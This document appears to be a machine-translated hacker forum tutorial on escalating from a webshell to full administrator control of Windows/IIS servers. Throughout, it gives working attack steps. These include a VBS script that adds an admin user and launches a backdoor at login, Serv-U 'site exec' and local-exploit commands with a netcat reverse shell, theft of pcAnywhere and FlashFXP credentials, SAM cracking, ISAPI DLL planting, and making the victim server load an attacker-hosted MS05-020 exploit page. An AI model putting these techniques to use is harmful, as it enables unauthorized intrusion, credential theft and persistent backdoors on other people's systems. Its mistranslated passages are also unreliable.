Classic webshell Elevation of Privilege

Speaking of getting a webshell,
Of course, I still want to continue to obtain the admin permission of the entire server, just as it is not a good hacker who doesn't want to get the admin permission ~
Xi ~~ Come with me and see what can be used to escalate Permissions
**************************************** ************************************
First
If the PCAnyWhere Server is installed on the server, the administrator needs to facilitate management.
It also gives us convenience, to the system disk's Documents and Settings/all us
ERS/Application Data/Symantec/pcAnywhere/download *. CIF local
The pcAnywhere connection will be okay if the attack is cracked.
**************************************** ************************************
Second
A lot of Tom asked me to upgrade the IIS user permission of webshell.
Generally, the management of servers is completed on the local machine and uploaded to the space,
FTP is used, and ServU is the most used server.
Then we can use ServU to raise the permission.
To enhance permissions through ServU, you need to write the ServU installation directory ~

First, access servudaemon. ini in The ServU installation folder through webshell and download it.
And then install a ServU on the local machine to overwrite servudaemon. ini in the local installation folder,
Start ServU and add a user, set as system administrator, directory c:/, with executable permission
Go To The ServU installation directory and change servudaemon. ini to the server.

Connect with my new user and password ~
Okay, it's still connected.
FTP
Ftp> open IP
Connected to IP.
220 Serv-u ftp server v5.0.0.4 for Winsock ready...
User (IP :( none): Id // The user you just added
331 user name okay, please send complete e-mail address as password.
Password: Password // Password
230 user logged in, proceed.
Ftp> Cd winnt // enter the WINNT directory of Win2k
250 directory changed to/winnt
Ftp> Cd system32 // enter the System32 directory
250 directory changed to/winnt/system32
Ftp> quote site exec net.exe user Rover rover1234/Add // use the system's net.exe
File and user.

If you are prompted that you do not have the permission
Upload the background (server.exe) to the System32 directory.
Then write a vbs tutorial.
Set wshshell = Createobject ("wscript. Shell ")
A = wshshell. Run ("cmd.exe/C net user pass/Add", 0)
B = wshshell. Run ("cmd.exe/C net localgroup administrators user/Add", 0)
B = wshshell. Run ("cmd.exe/C server.exe", 0)

Saved as XX. VBE
The role of this tutorial is to set the user password to pass
And promoted to administrator
Then execute server.exe in the system32directory.
Pass this tutorial to C:/Documents and Settings/all users/Start Menu/Program/
Directory
In this way, the Administrator will execute the tutorial as soon as he logs in.
The next step is to wait. Wait for him to log on.
**************************************** ************************************
Third
Check the system services, programs automatically started with the system, and frequently used software by administrators, such as Norton, vadministrator, Kingsoft, rising star, WinRAR, and even QQ, can it be written? If you can, modify the program, bind a batch or vbs, and wait for the server to restart.
**************************************** ************************************
Fourth
Find the conn and config files and pass the files to see if you can get the SA or MySQL password.
Gains and so on.
**************************************** ************************************
Fifth
Using flashfxp can also improve permissions, but the success rate depends on your luck.
First, find the flashfxp folder and open (edit) sites. dat. This file contains the password and user name,
The password is encrypted. If I copy these files back to my local computer, replace the local files. Then, you will find that the site manager is the same as opening flashfxp on the site. You can add n more bots ~~ Xi ~

Huh ?? No, it's about improving the permissions. Don't give up halfway.
Let's take a look at the website manager of the other administrator. the user name and password are asterisks. You can use the XP asterisks password viewer to view the information, and then use sites. in dat, the passwords are encrypted, and the passwords are displayed in plain text. Then, the website administrator's password is retrieved from the heap.
. Next, you can link these new servers ~~
After testing, you only need to replace the sites. dat file containing the password and user name with the corresponding local file.
Restore the passwords of each site of the Administrator.
**************************************** ************************************
Sixth

Win2k + iis5.0 by default, the application protection option is "medium (shared)". At this time, IIS is used to load ISAPI
The iwam_computername user identity is executed.
However, by default, Win2k + iis5 must be loaded as a system for some special isapis. Win2k + iis5,
Win2k + iis5 + SP1, Win2k + iis5 + SP2 are simple judgment of ISAPI file names without directory restrictions,
The isapis loaded with the system permission include:
1. idq. dll
2. httpext. dll
3. httpodbc. dll
4. ssinc. dll
5. msw3prt. dll
6. Author. dll
7. admin. dll
8. shtml. dll
9. sspifilt. dll
10. compfilt. dll
11. pwsdata. dll
12. md5filt. dll
13. fpexedll. dll

Therefore, it is easy to obtain the system permission. There is a bug when determining the file name, such as request/scripts/test % 81% 5cssinc. dll will also be considered as the requested ssinc. DLL, that is, the dual-byte Far East version is not taken into account when the file path is separated. Ssinc. DLL also has a problem when processing the path containing files, that is, "/" and "/" only recognize one "/". Therefore, if "/" is used in the request "/", this vulnerability may cause file paths to be incorrectly handled, and may cause leakage or permission vulnerabilities. Many other vulnerabilities (such as PHP and Asp) also exist.

Loading these isapis is not based solely on the file name, but on the path, which should be corrected.
Generally, the following conditions are met by default:
1. idq. dll D:/winnt/system32/idq. dll
2. httpext. dll D:/winnt/system32/inetsrv/httpext. dll
3. httpodbc. dll D:/winnt/system32/inetsrv/httpodbc. dll
4. ssinc. dll D:/winnt/system32/inrtsrv/ssinc. dll
5. msw3prt. dll D:/winnt/system32/msw3prt. dll
6. Author. dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/_ vti_aut/author. dll
7. admin. dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/_ vti_adm/admin. dll
8. shtml. dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/ISAPI/shtml. dll
9. sspifilt. dll D:/winnt/system32/inetsrv/sspifilt. dll
10. compfilt. dll D:/winnt/system32/inetsrv/compfilt. dll
11. pwsdata. dll D:/winnt/system32/inetsrv/pwsdata. dll
12. md5filt. dll D:/winnt/system32/inetsrv/md5filt. dll
13. fpexedll. dll D:/program files/common files/Microsoft shared/Web Server Extensions/40/bin/fpexedll. dll

Under normal circumstances, none of these paths can be written by guest, but if the configuration is not good, the IIS user can write these paths, and the permissions can be elevated.

You can upload isapihack. DLL to the executable directory of IIS. The file name can be ssinc. dll or admin. dll (one of the 13 file names listed above ).
Then, wait for IIS to restart and load the DLL to obtain the permission.
**************************************** ************************************
Seventh

Download the % WINDIR %/repair/SAM. * (Sam. _ in winnt 4 and Sam in Windows 2000) file,
And then use software such as L0pht for cracking. As long as it can be obtained, it will take time to crack it.
**************************************** ************************************
Eighth
Pipeupadmin (in Windows 2000), you can add the current user account to the Administrator group when running on the local machine. Normal users and users in the guests group can run successfully.
**************************************** ************************************
Ninth
Serv-u ftp server Local Privilege Escalation Vulnerability:
Many hosts do not have the permission to upload and run exp. directly uploaded Serv-U Local Exploit and NC, and put the su.exe file in C:/users and settings/all users/users. Then we use su.exe to directly create users, and a shell can be rebounded.
Specific commands:
Build user: serv-u.exe "cmd"
> User XL
& Gt; pass 111111

Reverse shell: serv-u.exe "nc.exe-l-P 99-e cmd.exe"

A good New Method for Privilege Escalation
Today, I want to bring you a new way to get the system permission after we get webshell. It is already a commonplace to improve the permission, there are already many methods for elevation of permissions on the network. I will not mention them here. Today I will introduce you to take the initiative to take advantage of the ms05020 vulnerability to achieve our goal of elevation of permissions.
Ms05020 is an IE vulnerability. Microsoft made this announcement in 2005.4 copies:
Security Vulnerability CN-VA05-025
Release date:
Vulnerability Type: Remote Code Execution
Vulnerability assessment: High Risk
Affected Versions:
Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-bit Edition Service Pack 1 (itanium)
Microsoft Windows XP 64-bit Edition 2003 (itanium)
Microsoft Windows Server 2003
Microsoft Windows Server 2003 (for itanium-based systems) Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (me) tested Microsoft Windows components:
Vulnerability description:
Internet Explorer has a remote code execution vulnerability because it processes some DHTML objects. Attackers can exploit this vulnerability by constructing malicious web pages. If a user accesses a malicious website, the malicious webpage may allow remote code execution. Attackers who successfully exploit this vulnerability can completely control the affected system. Internet Explorer has a remote code execution vulnerability because it processes URLs. Attackers can exploit this vulnerability by constructing malicious web pages. If a user accesses a malicious website, the malicious webpage may allow remote code execution. Attackers who successfully exploit this vulnerability can completely control the affected system. Internet Explorer has a remote code execution vulnerability because of its method for processing hierarchical audit files. Attackers can exploit this vulnerability by constructing a specially crafted hierarchical audit file. If a user accesses a malicious website or views a malicious email and accepts the installation of this malicious classification review file, the file may allow remote code execution. Attackers who successfully exploit this vulnerability can completely control the affected system. However, to exploit this vulnerability, a large amount of user interaction is required.

Have you seen the vulnerability description above? Attackers are attacked only when they are browsed. We usually use the IE vulnerability to first put an aggressive page on the Internet, and then wait for others to browse, so that the browser will be attacked.
Today, we want to improve our permissions. Naturally, we want to allow hosts with higher permissions to browse vulnerable pages. How can we allow hosts to browse this page after we get webshell?
The exp Page code of ms05020 has come out. You can go:
Http://www.eviloctal.com/forum/read.php? Tid = 10127
Download it. If we have put this exp at http://www.xxxx.com/ms05020.html,
Next we will start to use this exp to access our ASP Trojan and open mongoshell. If you cannot use it, we will find a solution (you can upload a cmd. EXE file by yourself ).
Enter the: Start http://www.xxxx.com/ms05020.html in the command line and then click execute.

At this time, the host's IE will access our ms05020.html. If the host does not have a pin, it will be bound to a 28876 fracture on the host.
Next, enter netstat-an | find "28876" to check whether the binding is successful. If the binding is successful for the first time, it will be slower. You have to wait and I will be successful soon. Then we can telnet and it will be successful immediately.

You can see: (I added a temp administrator)

Now we have the system permission. What else do you want to do?

Note: You can upload the NC file first, connect to the local file, and then enter:
Start http://www.xxx.com/ms05020.html.
You can also enter the following information if possible:
Start "C:/program files/Internet Explorer/icxplore.exe" http://www.xxx.com/ms05020.htm
This depends on your situation. Generally, if the VM allows access, you should use the first command!
I have tested 2 k pro, 2 k server (2000 Enterprise Terminal Server), and 2003! However, there are also failures, and the probability of failure is very high, especially when I arrived at the virtual machine, once I did not succeed, and then I opened 3389, and found that IE did not pop up, instead, an Internet Explorer setting wizard is provided, which means that the server cannot access the network without configuring Internet settings for Internet Explorer, in fact, I have not figured out how it will be successful. I cannot think of it, because start ist: http://www.xxx.com/xxx.exeis always successful!
Put XXX. EXE downloaded to its computer! I finally think this is related to the ms05020.htm file. AI, it seems that the value of this method is also very small, and I didn't want to make it out. Since it was written, I 'd like to make it out! I just discussed it with invincible. He also said the cause of the failure is probably the same, and the system has installed the IE patch.